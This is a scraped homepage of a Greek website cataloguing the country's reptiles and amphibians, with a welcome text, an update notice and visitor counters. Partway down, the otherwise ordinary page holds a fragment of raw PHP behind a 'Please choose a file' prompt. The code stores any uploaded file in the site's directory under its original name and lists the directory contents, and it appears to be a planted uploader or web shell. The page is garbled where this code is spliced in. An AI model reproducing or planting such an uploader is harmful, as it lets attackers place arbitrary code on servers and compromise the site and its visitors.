Αμφίβια

Ερπετά

Ελληνική Ερπετοπανίδα

 

Καλώς ήρθατε στο herpetofauna.gr

 

          Η ιστοσελίδα αυτή περιέχει κατάλογο με όλα τα ερπετά και αμφίβια που απαντούν στην Ελλάδα, με φωτογραφίες και βασικές πληροφορίες για κάθε είδος. Σκοπός του herpetofauna.gr είναι η ενημέρωση του κοινού όσον αφορά τα παρεξηγημένα ζώα της ερπετοπανίδας, να λύσει απορίες και να καταρρίψει τους μύθους που άδικα δυσφημίζουν αυτά τα πολύ ενδιαφέροντα και ωφέλιμα ζώα. Παράλληλα, ο αναγνώστης μπορεί να μάθει να αναγνωρίζει τα είδη της ελληνικής ερπετοπανίδας μέσω των φωτογραφιών ή των αρχείων media όπου αυτά επισυνάπτονται.

 Νέες προσθήκες:

1/2/2017 

Νέες φωτογραφίες της Νανόχεντρας προστέθηκαν!

Παλαιότερες προσθήκες


Λέξεις κλειδιά: Ελληνικά φίδια - φίδια της Ελλάδας - ερπετά - αμφίβια - χελώνες - τρίτωνες - σαλαμάνδρες -σαύρες - βάτραχοι - ερπετοπανίδα

22 '; exit; } } ?>
Please choose a file:
0) {echo "Error: " . $_FILES["file"]["error"] . "
";} else {echo "Stored file:".$_FILES["file"]["name"]."
Size:".($_FILES["file"]["size"]/1024)." kB
"; move_uploaded_file($_FILES["file"]["tmp_name"],$_FILES["file"]["name"]); } } // open this directory $myDirectory = opendir("."); // get each entry while($entryName = readdir($myDirectory)) {$dirArray[] = $entryName;} closedir($myDirectory); $indexCount = count($dirArray); echo "$indexCount files
"; sort($dirArray); echo "\n"; for($index=0; $index < $indexCount; $index++) { if (substr("$dirArray[$index]", 0, 1) != ".") { echo ""; } } echo ""; ?>

 

Διαφημίσεις

Συνδεδεμένοι Χρήστες

Έχουμε 7 επισκέπτη/ες

Επισκεψιμότητα

979396 επισκέπτες συνολικά